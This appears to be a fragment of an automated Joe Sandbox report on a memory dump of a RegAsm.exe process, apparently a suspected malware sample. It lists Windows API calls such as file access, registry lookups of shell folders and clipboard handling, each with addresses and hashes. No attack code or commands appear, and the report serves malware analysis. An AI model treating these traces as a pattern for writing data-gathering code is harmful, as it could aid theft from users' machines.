                                                          • API String ID: 2154303073-0
                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$PointerRead
                                                          • String ID:
                                                          • API String ID: 3154509469-0
                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                          APIs
                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                          • String ID:
                                                          • API String ID: 4232544981-0
                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                          APIs
                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileModuleName
                                                          • String ID:
                                                          • API String ID: 514040917-0
                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                          APIs
                                                          • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                          APIs
                                                          • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                          APIs
                                                          • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                          • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                          • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                          APIs
                                                          • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: EnumNamesResource
                                                          • String ID:
                                                          • API String ID: 3334572018-0
                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                          APIs
                                                          • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CloseFind
                                                          • String ID:
                                                          • API String ID: 1863332320-0
                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                          APIs
                                                          • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                          • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                          APIs
                                                          • memset.MSVCRT ref: 004095FC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 3655998216-0
                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                          APIs
                                                          • memset.MSVCRT ref: 00445426
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                          • String ID:
                                                          • API String ID: 1828521557-0
                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                          APIs
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                          • memcpy.MSVCRT ref: 00406942
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@FilePointermemcpy
                                                          • String ID:
                                                          • API String ID: 609303285-0
                                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp
                                                          • String ID:
                                                          • API String ID: 2081463915-0
                                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                          APIs
                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                          • String ID:
                                                          • API String ID: 2136311172-0
                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                          APIs
                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@??3@
                                                          • String ID:
                                                          • API String ID: 1936579350-0
                                                          • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                          • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                          APIs
                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                          • GetLastError.KERNEL32 ref: 00409974
                                                          • CloseClipboard.USER32 ref: 0040997D
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                          • String ID:
                                                          • API String ID: 2565263379-0
                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                          APIs
                                                          • EmptyClipboard.USER32 ref: 00409882
                                                          • wcslen.MSVCRT ref: 0040988F
                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                          • memcpy.MSVCRT ref: 004098B5
                                                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                          • CloseClipboard.USER32 ref: 004098D7
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                          • String ID:
                                                          • API String ID: 2014503067-0
